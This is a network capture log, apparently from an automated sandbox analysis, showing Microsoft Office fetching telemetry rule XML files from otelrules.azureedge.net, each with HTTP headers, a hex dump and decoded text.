                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.44980313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:22 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:22 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: ab991284-101e-005a-2ab3-42882b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114822Z-174f784596886s2bhC1EWR743w00000011dg000000005h3m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        55192.168.2.44980413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:22 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:22 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                        x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114822Z-174f7845968zgtf6hC1EWRqd8s0000000u8g000000008sxs
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.2.44980513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:22 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:22 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                        x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114822Z-174f7845968kdththC1EWRzvxn0000000dsg00000000492w
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        57192.168.2.44980713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:24 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:24 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                        x-ms-request-id: 926e5261-401e-008c-1d9e-4286c2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114824Z-174f78459685m244hC1EWRgp2c000000114g000000009cee
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        58192.168.2.44980613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:24 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                        x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114824Z-174f7845968ljs8phC1EWRe6en00000011ag0000000013sx
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.2.44980913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:24 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                        x-ms-request-id: bf7ba01b-c01e-007a-6b4e-41b877000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114824Z-174f7845968jrjrxhC1EWRmmrs00000011h0000000004wvk
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.2.44980813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:24 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:25 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                        x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114824Z-174f7845968kvnqxhC1EWRmf3g0000000n500000000071wq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.2.44981013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:24 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:25 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                        x-ms-request-id: 9fbcff65-e01e-0099-19a3-42da8a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114824Z-174f7845968vqt9xhC1EWRgten00000011c0000000007q50
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.2.44981113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:26 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                        x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114826Z-174f7845968vqt9xhC1EWRgten00000011eg000000004env
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.2.44981213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:26 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:27 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 485
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                        ETag: "0x8DC582BB9769355"
                                                                                        x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114826Z-174f7845968psccphC1EWRuz9s00000011ng000000005m87
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:27 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        64192.168.2.44981313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:27 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 411
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989AF051"
                                                                                        x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114826Z-174f7845968cpnpfhC1EWR3afc00000010zg000000006qeg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
